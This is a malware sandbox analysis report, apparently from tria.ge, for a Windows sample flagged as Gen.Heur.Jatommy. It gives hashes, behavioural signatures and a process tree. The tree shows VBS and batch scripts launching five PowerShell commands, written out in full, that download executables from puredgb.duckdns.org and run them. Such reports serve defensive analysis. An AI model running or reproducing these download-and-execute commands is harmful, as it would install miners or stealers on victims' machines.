Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system -
submitted
28/03/2024, 09:24
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
Resource
win7-20240319-en
General
-
Target
SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
-
Size
451KB
-
MD5
6614077c77a8182f0307a720071f2197
-
SHA1
06a06a6d02ad281942ed8b6890f099be54275bb2
-
SHA256
2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132
-
SHA512
26b1249631b8762d332b04ccac12faf4e52a4641efa90ff0c13596715c5ef8f4eb08c4e6e32efe551ebf3a3a432a897c33eafa9980dd12eeb65213081f3d77cb
-
SSDEEP
12288:QLMEalqxXblqoRX5qbfphLxaO3qX+t4SJ:cqaXNabfphLxa4w4
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2512 powershell.exe 2548 powershell.exe 2460 powershell.exe 2464 powershell.exe 436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2512 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 436 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2184 wrote to memory of 2216 2184 SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe 28 PID 2184 wrote to memory of 2216 2184 SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe 28 PID 2184 wrote to memory of 2216 2184 SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe 28 PID 2216 wrote to memory of 1744 2216 WScript.exe 29 PID 2216 wrote to memory of 1744 2216 WScript.exe 29 PID 2216 wrote to memory of 1744 2216 WScript.exe 29 PID 1744 wrote to memory of 2512 1744 cmd.exe 31 PID 1744 wrote to memory of 2512 1744 cmd.exe 31 PID 1744 wrote to memory of 2512 1744 cmd.exe 31 PID 1744 wrote to memory of 2548 1744 cmd.exe 32 PID 1744 wrote to memory of 2548 1744 cmd.exe 32 PID 1744 wrote to memory of 2548 1744 cmd.exe 32 PID 1744 wrote to memory of 2460 1744 cmd.exe 33 PID 1744 wrote to memory of 2460 1744 cmd.exe 33 PID 1744 wrote to memory of 2460 1744 cmd.exe 33 PID 1744 wrote to memory of 2464 1744 cmd.exe 34 PID 1744 wrote to memory of 2464 1744 cmd.exe 34 PID 1744 wrote to memory of 2464 1744 cmd.exe 34 PID 1744 wrote to memory of 436 1744 cmd.exe 35 PID 1744 wrote to memory of 436 1744 cmd.exe 35 PID 1744 wrote to memory of 436 1744 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\down.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\down.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\6.exe'; C:\Users\Admin\AppData\Roaming\6.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\1.exe'; C:\Users\Admin\AppData\Roaming\1.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\2.exe'; C:\Users\Admin\AppData\Roaming\2.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/6nif5f8r/address.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\5.exe'; C:\Users\Admin\AppData\Roaming\5.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\4.exe'; C:\Users\Admin\AppData\Roaming\4.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD548d0fbe997f37f768ab67afa935f4db8
SHA121bd27b35e0edd6e4a02c5d3e19ba3e1388e36c5
SHA256bff2534d8b88513358894215ac244520d70b226e463d3035c4ca39892dacfff7
SHA512286e7190ee8840f54977f78e101087a8d73682b665fee75bdb68d8e3f51ee0b6ace28a69f52953c36951e979bb9b9299d7341d415165141202738bc7b8eb341d
-
Filesize
121B
MD5f320a0b986e09c248827af4ee48e23b9
SHA1083fd1f18057e1077d5a88f54e190e95c910918f
SHA256ab93c1042a9eca743335a1dc9192e3df891960b00d243278f18c3b8beff0555f
SHA51233150cbb8734eb6f37dec03ca573766d5f0324774bce9f28d259c180f1a26ede32dc11a1d8378473ac32a297e8770456a27b942d860003c0f316fc7ecc58eae3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f67c0e8062105197a16d057247185262
SHA1cb774ec018dc8c1c06b27e57292424af52edbc21
SHA256db9e1abcd3027ca4d32219ab60eb72fd4548eef1e6bdfbfc48c5cc83795b4e1a
SHA512e8a7ff3ecf2904d749ce873ccfc8d4a1f31e33ed2a0a426f0dc78501f75d6c8ba3fe45b1716089e3e2baee3bb37dcdf571c5016136ed0d8c9ad8fa23202ebc3a